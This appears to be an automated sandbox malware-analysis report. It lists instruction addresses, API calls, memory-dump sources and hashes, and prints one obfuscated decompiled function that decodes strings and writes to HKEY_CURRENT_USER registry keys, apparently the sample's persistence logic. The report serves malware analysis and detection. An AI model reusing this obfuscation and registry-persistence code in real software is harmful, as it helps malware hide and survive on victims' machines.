                                                                                                                                                        0x00000000
                                                                                                                                                        0x0046070f
                                                                                                                                                        0x00460502
                                                                                                                                                        0x00460508
                                                                                                                                                        0x00460944
                                                                                                                                                        0x00460951
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00460951
                                                                                                                                                        0x0046050e
                                                                                                                                                        0x00460514
                                                                                                                                                        0x00460959
                                                                                                                                                        0x0046095e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0046095e
                                                                                                                                                        0x0046051a
                                                                                                                                                        0x0046051c
                                                                                                                                                        0x00460522
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00460528
                                                                                                                                                        0x0046052a
                                                                                                                                                        0x0046052f
                                                                                                                                                        0x00460535
                                                                                                                                                        0x0046053b
                                                                                                                                                        0x00460545
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00460545
                                                                                                                                                        0x00460395
                                                                                                                                                        0x00460395
                                                                                                                                                        0x0046039b
                                                                                                                                                        0x0046068d
                                                                                                                                                        0x00460693
                                                                                                                                                        0x00460b3b
                                                                                                                                                        0x00460b40
                                                                                                                                                        0x00460699
                                                                                                                                                        0x00460699
                                                                                                                                                        0x0046069f
                                                                                                                                                        0x00460b4d
                                                                                                                                                        0x00460b4f
                                                                                                                                                        0x004606a5
                                                                                                                                                        0x004606a5
                                                                                                                                                        0x004606a7
                                                                                                                                                        0x004606ad
                                                                                                                                                        0x004606b7
                                                                                                                                                        0x004606c4
                                                                                                                                                        0x004606c4
                                                                                                                                                        0x004606ad
                                                                                                                                                        0x0046069f
                                                                                                                                                        0x004603a1
                                                                                                                                                        0x004603a1
                                                                                                                                                        0x004603a7
                                                                                                                                                        0x00460815
                                                                                                                                                        0x00460822
                                                                                                                                                        0x004603ad
                                                                                                                                                        0x004603ad
                                                                                                                                                        0x004603b3
                                                                                                                                                        0x0046082e
                                                                                                                                                        0x0046083b
                                                                                                                                                        0x004603b9
                                                                                                                                                        0x004603b9
                                                                                                                                                        0x004603bb
                                                                                                                                                        0x004603c1
                                                                                                                                                        0x004603c7
                                                                                                                                                        0x004603c9
                                                                                                                                                        0x004603c9
                                                                                                                                                        0x004603c1
                                                                                                                                                        0x004603b3
                                                                                                                                                        0x004603a7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0046039b
                                                                                                                                                        0x0046038f
                                                                                                                                                        0x00460318

                                                                                                                                                        APIs
                                                                                                                                                        • SleepEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,FD91BC21), ref: 004609AE
                                                                                                                                                          • Part of subcall function 00453A22: CreateMutexExA.KERNEL32(?,?,?,079849AE,0701B759,004609DE), ref: 00453A4E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000012.00000002.434902684.0000000000451000.00000020.00000001.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                        • Associated: 00000012.00000002.434893531.0000000000450000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000012.00000002.434916593.0000000000464000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000012.00000002.434932447.0000000000467000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                        • String ID: 0u$?VN$?VN$c/9$c/9$Ug$Ug
                                                                                                                                                        • API String ID: 1464230837-3375559661
                                                                                                                                                        • Opcode ID: 6b69fe40e889eeef2de17b3194c4735dd1379a6845d9a8b4328103bb9d698c9b
                                                                                                                                                        • Instruction ID: 8c7387a1387447830908c34d0d8850a633ee54aa480e4b1926b939c868f83a86
                                                                                                                                                        • Opcode Fuzzy Hash: 6b69fe40e889eeef2de17b3194c4735dd1379a6845d9a8b4328103bb9d698c9b
                                                                                                                                                        • Instruction Fuzzy Hash: 5712F7717182448BCB6C8759D4A063F7691E789B49F60011FFA4BCBB65EA6CCC818F4B
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0045A8E0, Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 609registryCOMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                        			E0045A8E0(long long __rcx) {
				signed long long _v72;
				long long _v80;
				signed long long _v88;
				long long _v96;
				void* _v104;
				void* _v112;
				long long _v120;
				long long _v128;
				signed long long _v136;
				signed int _v140;
				long long _v152;
				void* _v160;
				long long _v168;
				signed long long _v176;
				void* _v184;
				void* _v192;
				intOrPtr _v196;
				long _v200;
				long long _v208;
				signed long long _v216;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				signed int _v348;
				void* _v352;
				intOrPtr _v356;
				signed long long _v368;
				long long _v376;
				long long _v384;
				long long _v392;
				long _t281;
				void* _t290;
				void* _t401;
				long long _t413;
				signed long long _t415;
				signed long long _t417;
				long long _t418;
				long long _t420;
				signed long long _t429;
				signed long long _t430;
				signed long long _t438;
				long long _t447;
				void* _t452;
				void* _t454;
				void* _t458;
				long long _t463;
				long long _t465;

				_t430 = __rcx;
				_t447 = __rcx;
				_t465 =  &_v192;
				_v128 = _t465;
				_t413 = _v128;
				 *_t465 = 0;
				E0045CDB9(0xa, _t413);
				_v184 = _t413;
				E0045CDB9(0x64, _t413);
				_v120 = _t413;
				_v112 = _t447 + 0xaa4;
				_t415 = _v112;
				_v140 = ( *_t415 ^ 0xffffffef) &  *_t415;
				_t429 =  &_v352 | _t415;
				_v80 = _t447 + 0xab8;
				_t417 = _t447 + 0x2bc;
				_v88 = _t417;
				_v96 = _t447;
				_t463 = _t447 + 0x872;
				_t255 = 0x5027d5f0;
				r15d = 0xe8cc1edd;
				while(1) {
					L1:
					_v216 = _t430;
					L2:
					while(1) {
						L2:
						while(_t255 > 0x168e06be) {
							if(_t255 > 0x379b7277) {
								if(_t255 <= 0x5027d5ef) {
									if(_t255 == 0x379b7278) {
										r13d = _v356;
										r13d = r13d + 1;
										_t255 = 0xc32d9c1;
										continue;
									}
									if(_t255 == 0x44c06beb) {
										_v352 = bpl;
										_v348 = 0x37f4150c;
										_v344 = 0x78ff0330;
										if(_v352 != bpl) {
											L81:
											_t430 = _v184;
											_t438 = _t429;
											r8d = 8;
											L82:
											E0045C96E(_t255, _t430, _t438);
											_t255 = 0x1f90feb9;
											continue;
										}
										do {
											 *(_t452 + 0x4c + _t417 * 4) = ( *(_t452 + 0x4c + _t417 * 4) & 0x5899ac94 |  !( *(_t452 + 0x4c + _t417 * 4)) & 0xa766536b) ^ 0xdffc3335;
											_t255 = 1;
										} while (_t417 == 0);
										goto L81;
									}
									if(_t255 == 0x4503fe33) {
										_v152 = _v176;
										_t417 = _v112;
										_v196 =  *_t417;
										_t255 =  ==  ? 0xb8f2f0e4 : 0xf6561ee3;
									}
									continue;
								}
								if(_t255 > 0x712cc1e9) {
									if(_t255 == 0x712cc1ea) {
										r8d = 0x96bc22d6;
										r9d = 0xe0;
										E0045FAD7(2, _t401, _t417, _t430);
										_t430 = _v192; // executed
										RegCloseKey(??); // executed
										_t255 = 0x7451cd36;
										continue;
									}
									if(_t255 != 0x7451cd36) {
										continue;
									}
									r8d = 0;
									r9d = 0;
									E00458598(_t417, _v96, _v96 + 0x668, _t462);
									return 1;
								}
								if(_t255 == 0x5027d5f0) {
									_t255 =  ==  ? 0x18e2ce36 : 0x5a2c00bf;
									continue;
								}
								if(_t255 != 0x5a2c00bf) {
									continue;
								}
								_v352 = bpl;
								_v348 = 0x614f9309;
								if(_v352 == bpl) {
									_t266 = _v348;
									_t255 = _v348 & 0x9ede19a4 |  !_t266 & 0x6121e65b;
									_v348 = _v348 & 0x9ede19a4 |  !_t266 & 0x6121e65b;
								}
								_t430 = _v184;
								_t438 = _t429;
								r8d = 4;
								goto L82;
							}
							if(_t255 <= 0x1f90feb8) {
								if(_t255 == 0x168e06bf) {
									_v352 = bpl;
									_v348 = 0x5d82976;
									_v344 = 0x14cc2752;
									_v340 = 0x12d70b79;
									_v336 = 0x1ecd2957;
									_v332 = 0x26e23243;
									_v328 = 0x1eda284c;
									_v324 = 0x32e23552;
									_v320 = 0x14cc3450;
									_v316 = 0x14e8324b;
									_v312 = 0x1ed73557;
									_v308 = 0x71be464b;
									if(_v352 != bpl) {
										L74:
										r8d = 0x6e0c8ed2;
										r9d = 0xd6;
										E0045FAD7(2, _t401, _t417, _t430);
										_v392 = _t465;
										_t430 = 0x80000001;
										r8d = 0;
										r9d = 4;
										 *_t417();
										_t255 =  ==  ? 0xdc3ec930 : 0x84ad030e;
										continue;
									}
									do {
										 *(_t452 + 0x48 + _t417 * 4) = ( *(_t452 + 0x48 + _t417 * 4) & 0xd748046d |  !( *(_t452 + 0x48 + _t417 * 4)) & 0x28b7fb92) ^ 0x5909bdb7;
										_t430 = _t430 + 1;
										_t417 = _t417 + 1;
									} while (_t417 != 0xc);
									goto L74;
								}
								if(_t255 == 0x18e2ce36) {
									_t255 =  ==  ? 0x44c06beb : 0x5a2c00bf;
									continue;
								}
								if(_t255 != 0x1a00302e) {
									continue;
								}
								_v352 = bpl;
								_v348 = 0x4f3a31ae;
								_v344 = 0x6a1a42f8;
								if(_v352 != bpl) {
									L40:
									_t430 = _v368;
									_t462 = _v168;
									E0046020E(_t417, _t430, _t429, _v152, _v168);
									_t417 = _v208 + 0x6c;
									L87:
									_v136 = _t417;
									_t255 = 0x274e8135;
									continue;
								}
								do {
									 *(_t452 + 0x4c + _t417 * 4) =  *(_t452 + 0x4c + _t417 * 4) & 0x95e5bd74 |  !( *(_t452 + 0x4c + _t417 * 4)) & 0x6a1a428b;
								} while (_t417 == 0);
								goto L40;
							}
							if(_t255 > 0x2b872d16) {
								if(_t255 == 0x2b872d17) {
									_t417 = _v160;
									_t255 =  ==  ? 0xb2c3da8d : 0x1a00302e;
								} else {
									if(_t255 == 0x36912e25) {
										E0045CDB9(0x1f4, _t417);
										_v368 = _t417;
										_v208 = _v80;
										_v168 = _v208 + _t430;
										_v104 = _v88;
										_v160 = _t463;
										_t417 = _v160;
										_t255 =  ==  ? 0x4503fe33 : 0x98abedfc;
										_t430 = _v104;
										_v176 = _t430;
									}
								}
								continue;
							}
							if(_t255 == 0x1f90feb9) {
								_v352 = bpl;
								_v348 = 0x2b4ad400;
								_v344 = 0x3a5eda24;
								_v340 = 0x3c45f60f;
								_v336 = 0x305fd421;
								_v332 = 0x870cf35;
								_v328 = 0x3048d53a;
								_v324 = 0x1c70c824;
								_v320 = 0x3a5ec926;
								_v316 = 0x3a7acf3d;
								_v312 = 0x3045c821;
								_v308 = 0x2c09e73d;
								_v304 = 0x5f2cbb53;
								if(_v352 != bpl) {
									L68:
									E0046020E(_t417, _v120, _t429, _v184, _t462);
									r8d = 0x6e0c8ed2;
									r9d = 0xd6;
									E0045FAD7(2, _t401, _t417, _v120);
									_v392 = _t465;
									_t430 = 0x80000001;
									r8d = 0;
									r9d = 2; // executed
									_t281 = RegOpenKeyExA(??, ??, ??, ??, ??); // executed
									_v200 = _t281;
									_t255 =  ==  ? 0x168e06bf : 0x835416f8;
									continue;
								}
								do {
									 *(_t452 + 0x48 + _t417 * 4) =  *(_t452 + 0x48 + _t417 * 4) & 0xa0d344ac |  !( *(_t452 + 0x48 + _t417 * 4)) & 0x5f2cbb53;
									_t430 = _t430 + 1;
									_t417 = _t417 + 1;
								} while (_t417 != 0xd);
								goto L68;
							} else {
								if(_t255 == 0x274e8135) {
									_t417 = _v136;
									_v72 = _t417;
									_t255 = 0xc32d9c1;
									r13d = 0;
								}
								continue;
							}
						}
						if(_t255 > 0xd7604324) {
							if(_t255 <= 0xf5c8adac) {
								if(_t255 == 0xd7604325) {
									_v216 = _t417;
									r8d = 0x96bc22d6;
									r9d = 0xe0;
									E0045FAD7(2, _t401, _t417, _t430);
									_t430 = _v192;
									 *_t417();
									_t255 = 0xe8cc1edd;
									continue;
								}
								if(_t255 == 0xdc3ec930) {
									r8d = 0x6a44d3e0;
									r9d = 0xf4;
									E0045FAD7(2, _t401, _t417, _t430);
									_t430 = _v192;
									 *_t417();
									_t290 = 0xd7604325;
									L93:
									_t255 =  ==  ? r15d : _t290;
									while(1) {
										L1:
										_v216 = _t430;
										goto L2;
									}
								}
								if(_t255 == 0xe8cc1edd) {
									_t417 = _v216;
									_t255 =  ==  ? 0x7451cd36 : 0x36912e25;
								}
								continue;
							}
							if(_t255 > 0x664c0d6) {
								if(_t255 == 0x664c0d7) {
									L90:
									_t255 = 0xe8cc1edd;
									goto L1;
								}
								if(_t255 == 0xc32d9c1) {
									_v356 = r13d;
									_t430 = _v368;
									_t255 =  ==  ? 0xa06c8638 : 0x379b7278;
								}
								continue;
							}
							if(_t255 == 0xf5c8adad) {
								_t430 = _v368;
								E0045CC2E(_t417, _t430);
								_t255 = 0x712cc1ea;
								continue;
							}
							if(_t255 != 0xf6561ee3) {
								continue;
							}
							_t458 = _v208 + 0x6c;
							_v352 = bpl;
							_v348 = 0xc96c11e;
							_v344 = 0x297d418;
							_v340 = 0x50d2cf52;
							_v336 = 0x47dccb18;
							_v332 = 0x43d2c905;
							_v328 = 0x6ad2c819;
							_v324 = 0x7ea7ef36;
							_v320 = 0x5694c32e;
							_v316 = 0x4780cd0a;
							_v312 = 0x419be121;
							_v308 = 0x4d81c30f;
							_v304 = 0x75aed81b;
							_v300 = 0x4d96c214;
							_v296 = 0x61aedf0a;
							_v292 = 0x4780de08;
							_v288 = 0x47a4d813;
							_v284 = 0x4d9bdf0f;
							_v280 = 0x57a0f013;
							_v276 = 0x44dd8c13;
							_v272 = 0x284835d;
							_v268 = 0xdd2df58;
							_v264 = 0x67a08c09;
							_v260 = 0x78a1f33a;
							_v256 = 0x296835d;
							_v252 = 0x51d78e21;
							_v248 = 0x7e81895d;
							_v244 = 0x2d48c5f;
							_v240 = 0x5093d80e;
							_v236 = 0xae8c09;
							_v232 = 0x2d0f035;
							_v228 = 0x7d2df58;
							_v224 = 0x22f2ac0e;
							if(_v352 != bpl) {
								L22:
								_t430 = _v368;
								_t420 = _v168;
								_t462 = _v152;
								_v376 = _t420;
								_v384 = _v152;
								_v392 = _t420;
								E0046020E(_t420, _t430, _t429, _t458, _v152);
								_t417 = _v368;
								_t255 = 0x712cc1ea;
								continue;
							} else {
								do {
									 *(_t452 + 0x4c + _t417 * 4) = ( *(_t452 + 0x4c + _t417 * 4) & 0x2cec6f53 |  !( *(_t452 + 0x4c + _t417 * 4)) & 0xd31390ac) ^ 0xf1e13cd1;
									_t417 = _t417 + 1;
								} while (_t417 != 0x20);
								goto L22;
							}
						}
						if(_t255 <= 0x98abedfb) {
							if(_t255 == 0x835416f8) {
								_t290 = 0x664c0d7;
								goto L93;
							}
							if(_t255 == 0x84ad030e) {
								goto L90;
							}
							if(_t255 == 0x8ef2779b) {
								_t255 = 0xf5c8adad;
							}
							continue;
						}
						if(_t255 > 0xb2c3da8c) {
							if(_t255 == 0xb2c3da8d) {
								_t454 = _v208 + 0x6c;
								_v352 = bpl;
								_v348 = 0x4c62decd;
								_v344 = 0x4263cbcb;
								_v340 = 0x1026d081;
								_v336 = 0x728d4cb;
								_v332 = 0x326d6d6;
								_v328 = 0x2a26d7ca;
								_v324 = 0x3e53f0e5;
								_v320 = 0x1660dcfd;
								_v316 = 0x774d2d9;
								_v312 = 0x16ffef2;
								_v308 = 0xd75dcdc;
								_v304 = 0x355ac7c8;
								_v300 = 0xd62ddc7;
								_v296 = 0x215ac0d9;
								_v292 = 0x774c1db;
								_v288 = 0x750c7c0;
								_v284 = 0xd6fc0dc;
								_v280 = 0x1754efc0;
								_v276 = 0x42993c0;
								_v272 = 0x42709c8e;
								_v268 = 0x4d26c08b;
								_v264 = 0x275493da;
								_v260 = 0x3855ece9;
								_v256 = 0x42629c8e;
								_v252 = 0x4275968c;
								_v248 = 0x4224c08b;
								_v244 = 0x16759388;
								_v240 = 0x4272c1cf;
								_v236 = 0x4224fb8c;
								_v232 = 0x4726c08b;
								_v228 = 0x6206b3dd;
								if(_v352 != bpl) {
									L86:
									_t430 = _v368;
									_t418 = _v168;
									_v376 = _t418;
									_v384 = _v152;
									_v392 = _t418;
									E0046020E(_t418, _t430, _t429, _t454, _v152);
									_t417 = _v208 + 0x4c;
									goto L87;
								}
								do {
									 *(_t452 + 0x48 + _t417 * 4) =  *(_t452 + 0x48 + _t417 * 4) & 0x9df94c51 |  !( *(_t452 + 0x48 + _t417 * 4)) & 0x6206b3ae;
									_t430 = _t430 + 1;
									_t417 = _t417 + 1;
								} while (_t417 != 0x20);
								goto L86;
							}
							if(_t255 == 0xb8f2f0e4) {
								_t255 =  ==  ? 0x2b872d17 : 0x1a00302e;
							}
							continue;
						}
						if(_t255 == 0x98abedfc) {
							E0045CDB9(0x3e8, _t417);
							_v176 = _t417;
							_v352 = bpl;
							_v348 = 0x2fcf5401;
							_v344 = 0x71ca0757;
							_v340 = 0x2ef2724;
							if(_v352 != bpl) {
								L64:
								_t462 = _v104;
								_t430 = _v176;
								E0046020E(_t417, _t430, _t429, _v160, _v104);
								_t255 = 0x4503fe33;
								continue;
							}
							do {
								 *(_t452 + 0x48 + _t417 * 4) = ( *(_t452 + 0x48 + _t417 * 4) & 0x68f1fcb9 |  !( *(_t452 + 0x48 + _t417 * 4)) & 0x970e0346) ^ 0x95e12462;
								_t430 = _t430 + 1;
								_t417 = _t417 + 1;
							} while (_t417 != 4);
							goto L64;
						} else {
							if(_t255 == 0xa06c8638) {
								r12d = _v356;
								r8d = 0xd31a9c34;
								r9d = 0xe3;
								E0045FAD7(2, _t401, _t417, _t430);
								_v384 = r12d;
								r15d = 0xe8cc1edd;
								_v392 = _v368;
								_t430 = _v192;
								r8d = 0;
								r9d = 1; // executed
								RegSetValueExA(??, ??, ??, ??, ??, ??); // executed
								_t255 =  ==  ? 0xf5c8adad : 0x8ef2779b;
							}
							continue;
						}
					}
				}
			}














































































                                                                                                                                                        0x0045a8e0
                                                                                                                                                        0x0045a8f3
                                                                                                                                                        0x0045a8f6
                                                                                                                                                        0x0045a8fe
                                                                                                                                                        0x0045a906
                                                                                                                                                        0x0045a90e
                                                                                                                                                        0x0045a91a
                                                                                                                                                        0x0045a91f
                                                                                                                                                        0x0045a92c
                                                                                                                                                        0x0045a931
                                                                                                                                                        0x0045a940
                                                                                                                                                        0x0045a948
                                                                                                                                                        0x0045a959
                                                                                                                                                        0x0045a96a
                                                                                                                                                        0x0045a974
                                                                                                                                                        0x0045a97c
                                                                                                                                                        0x0045a983
                                                                                                                                                        0x0045a98b
                                                                                                                                                        0x0045a993
                                                                                                                                                        0x0045a99a
                                                                                                                                                        0x0045a99f
                                                                                                                                                        0x0045a9a7
                                                                                                                                                        0x0045a9a7
                                                                                                                                                        0x0045a9a7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045a9af
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045a9af
                                                                                                                                                        0x0045aa6d
                                                                                                                                                        0x0045aca4
                                                                                                                                                        0x0045ae12
                                                                                                                                                        0x0045b28d
                                                                                                                                                        0x0045b292
                                                                                                                                                        0x0045b295
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045b295
                                                                                                                                                        0x0045ae1d
                                                                                                                                                        0x0045b29f
                                                                                                                                                        0x0045b2a4
                                                                                                                                                        0x0045b2ac
                                                                                                                                                        0x0045b2b9
                                                                                                                                                        0x0045b2e7
                                                                                                                                                        0x0045b2e7
                                                                                                                                                        0x0045b2ef
                                                                                                                                                        0x0045b2f2
                                                                                                                                                        0x0045b2f8
                                                                                                                                                        0x0045b2f8
                                                                                                                                                        0x0045b2fd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045b2fd
                                                                                                                                                        0x0045b2bd
                                                                                                                                                        0x0045b2d9
                                                                                                                                                        0x0045b2e0
                                                                                                                                                        0x0045b2e0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045b2bd
                                                                                                                                                        0x0045ae28
                                                                                                                                                        0x0045ae36
                                                                                                                                                        0x0045ae3e
                                                                                                                                                        0x0045ae48
                                                                                                                                                        0x0045ae67
                                                                                                                                                        0x0045ae67
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045ae28
                                                                                                                                                        0x0045acaf
                                                                                                                                                        0x0045af7b
                                                                                                                                                        0x0045b4f0
                                                                                                                                                        0x0045b4f6
                                                                                                                                                        0x0045b4fc
                                                                                                                                                        0x0045b501
                                                                                                                                                        0x0045b504
                                                                                                                                                        0x0045b506
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045b506
                                                                                                                                                        0x0045af86
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045b57f
                                                                                                                                                        0x0045b582
                                                                                                                                                        0x0045b585
                                                                                                                                                        0x0045b5a7
                                                                                                                                                        0x0045b5a7
                                                                                                                                                        0x0045acba
                                                                                                                                                        0x0045b158
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045b158
                                                                                                                                                        0x0045acc5
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045accb
                                                                                                                                                        0x0045acd0
                                                                                                                                                        0x0045acdd
                                                                                                                                                        0x0045acdf
                                                                                                                                                        0x0045acf2
                                                                                                                                                        0x0045acf4
                                                                                                                                                        0x0045acf4
                                                                                                                                                        0x0045acf8
                                                                                                                                                        0x0045ad00
                                                                                                                                                        0x0045ad03
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045ad03
                                                                                                                                                        0x0045aa78
                                                                                                                                                        0x0045ad3e
                                                                                                                                                        0x0045b160
                                                                                                                                                        0x0045b165
                                                                                                                                                        0x0045b16d
                                                                                                                                                        0x0045b175
                                                                                                                                                        0x0045b17d
                                                                                                                                                        0x0045b185
                                                                                                                                                        0x0045b18d
                                                                                                                                                        0x0045b195
                                                                                                                                                        0x0045b19d
                                                                                                                                                        0x0045b1a5
                                                                                                                                                        0x0045b1ad
                                                                                                                                                        0x0045b1b5
                                                                                                                                                        0x0045b1c2
                                                                                                                                                        0x0045b1f7
                                                                                                                                                        0x0045b1fe
                                                                                                                                                        0x0045b204
                                                                                                                                                        0x0045b20a
                                                                                                                                                        0x0045b20f
                                                                                                                                                        0x0045b214
                                                                                                                                                        0x0045b21e
                                                                                                                                                        0x0045b221
                                                                                                                                                        0x0045b227
                                                                                                                                                        0x0045b235
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045b235
                                                                                                                                                        0x0045b1cb
                                                                                                                                                        0x0045b1e7
                                                                                                                                                        0x0045b1eb
                                                                                                                                                        0x0045b1ee
                                                                                                                                                        0x0045b1f1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045b1cb
                                                                                                                                                        0x0045ad49
                                                                                                                                                        0x0045b24c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045b24c
                                                                                                                                                        0x0045ad54
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045ad5a
                                                                                                                                                        0x0045ad5f
                                                                                                                                                        0x0045ad67
                                                                                                                                                        0x0045ad74
                                                                                                                                                        0x0045ad9c
                                                                                                                                                        0x0045ad9c
                                                                                                                                                        0x0045ada1
                                                                                                                                                        0x0045adb4
                                                                                                                                                        0x0045adc1
                                                                                                                                                        0x0045b4b2
                                                                                                                                                        0x0045b4b2
                                                                                                                                                        0x0045b4ba
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045b4ba
                                                                                                                                                        0x0045ad78
                                                                                                                                                        0x0045ad8e
                                                                                                                                                        0x0045ad95
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045ad78
                                                                                                                                                        0x0045aa83
                                                                                                                                                        0x0045aeaf
                                                                                                                                                        0x0045b4c4
                                                                                                                                                        0x0045b4d9
                                                                                                                                                        0x0045aeb5
                                                                                                                                                        0x0045aeba
                                                                                                                                                        0x0045aec5
                                                                                                                                                        0x0045aeca
                                                                                                                                                        0x0045aed7
                                                                                                                                                        0x0045aeef
                                                                                                                                                        0x0045aeff
                                                                                                                                                        0x0045af07
                                                                                                                                                        0x0045af0f
                                                                                                                                                        0x0045af24
                                                                                                                                                        0x0045af27
                                                                                                                                                        0x0045af2f
                                                                                                                                                        0x0045af2f
                                                                                                                                                        0x0045aeba
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045aeaf
                                                                                                                                                        0x0045aa8e
                                                                                                                                                        0x0045b024
                                                                                                                                                        0x0045b029
                                                                                                                                                        0x0045b031
                                                                                                                                                        0x0045b039
                                                                                                                                                        0x0045b041
                                                                                                                                                        0x0045b049
                                                                                                                                                        0x0045b051
                                                                                                                                                        0x0045b059
                                                                                                                                                        0x0045b061
                                                                                                                                                        0x0045b069
                                                                                                                                                        0x0045b071
                                                                                                                                                        0x0045b079
                                                                                                                                                        0x0045b081
                                                                                                                                                        0x0045b08e
                                                                                                                                                        0x0045b0bd
                                                                                                                                                        0x0045b0d0
                                                                                                                                                        0x0045b0e4
                                                                                                                                                        0x0045b0ea
                                                                                                                                                        0x0045b0f0
                                                                                                                                                        0x0045b0f5
                                                                                                                                                        0x0045b0fa
                                                                                                                                                        0x0045b104
                                                                                                                                                        0x0045b107
                                                                                                                                                        0x0045b10d
                                                                                                                                                        0x0045b10f
                                                                                                                                                        0x0045b12a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045b12a
                                                                                                                                                        0x0045b097
                                                                                                                                                        0x0045b0ad
                                                                                                                                                        0x0045b0b1
                                                                                                                                                        0x0045b0b4
                                                                                                                                                        0x0045b0b7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045aa94
                                                                                                                                                        0x0045aa99
                                                                                                                                                        0x0045aa9f
                                                                                                                                                        0x0045aaa7
                                                                                                                                                        0x0045aaaf
                                                                                                                                                        0x0045aab4
                                                                                                                                                        0x0045aab4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045aa99
                                                                                                                                                        0x0045aa8e
                                                                                                                                                        0x0045a9bf
                                                                                                                                                        0x0045aac1
                                                                                                                                                        0x0045adcf
                                                                                                                                                        0x0045b25e
                                                                                                                                                        0x0045b26d
                                                                                                                                                        0x0045b273
                                                                                                                                                        0x0045b279
                                                                                                                                                        0x0045b27e
                                                                                                                                                        0x0045b281
                                                                                                                                                        0x0045b283
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045b283
                                                                                                                                                        0x0045adda
                                                                                                                                                        0x0045b542
                                                                                                                                                        0x0045b548
                                                                                                                                                        0x0045b54e
                                                                                                                                                        0x0045b553
                                                                                                                                                        0x0045b55c
                                                                                                                                                        0x0045b560
                                                                                                                                                        0x0045b565
                                                                                                                                                        0x0045b565
                                                                                                                                                        0x0045a9a7
                                                                                                                                                        0x0045a9a7
                                                                                                                                                        0x0045a9a7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045a9a7
                                                                                                                                                        0x0045a9a7
                                                                                                                                                        0x0045ade5
                                                                                                                                                        0x0045adeb
                                                                                                                                                        0x0045ae05
                                                                                                                                                        0x0045ae05
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045ade5
                                                                                                                                                        0x0045aacc
                                                                                                                                                        0x0045af41
                                                                                                                                                        0x0045b510
                                                                                                                                                        0x0045b510
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045b515
                                                                                                                                                        0x0045af4c
                                                                                                                                                        0x0045af52
                                                                                                                                                        0x0045af5b
                                                                                                                                                        0x0045af6e
                                                                                                                                                        0x0045af6e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045af4c
                                                                                                                                                        0x0045aad7
                                                                                                                                                        0x0045b132
                                                                                                                                                        0x0045b137
                                                                                                                                                        0x0045b13c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045b13c
                                                                                                                                                        0x0045aae2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0045aaf0
                                                                                                                                                        0x0045aaf4
                                                                                                                                                        0x0045aaf9
                                                                                                                                                        0x0045ab01
                                                                                                                                                        0x0045ab09
                                                                                                                                                        0x0045ab11
                                                                                                                                                        0x0045ab19
                                                                                                                                                        0x0045ab21
                                                                                                                                                        0x0045ab29
                                                                                                                                                        0x0045ab31
                                                                                                                                                        0x0045ab39
                                                                                                                                                        0x0045ab41
                                                                                                                                                        0x0045ab49
                                                                                                                                                        0x0045ab51
                                                                                                                                                        0x0045ab59
                                                                                                                                                        0x0045ab61
                                                                                                                                                        0x0045ab6c
                                                                                                                                                        0x0045ab77
                                                                                                                                                        0x0045ab82
                                                                                                                                                        0x0045ab8d
                                                                                                                                                        0x0045ab98
                                                                                                                                                        0x0045aba3
                                                                                                                                                        0x0045abae
                                                                                                                                                        0x0045abb9
                                                                                                                                                        0x0045abc4
                                                                                                                                                        0x0045abcf
                                                                                                                                                        0x0045abda
                                                                                                                                                        0x0045abe5
                                                                                                                                                        0x0045abf0
                                                                                                                                                        0x0045abfb
                                                                                                                                                        0x0045ac06
                                                                                                                                                        0x0045ac11
                                                                                                                                                        0x0045ac1c
                                                                                                                                                        0x0045ac27
                                                                                                                                                        0x0045ac37
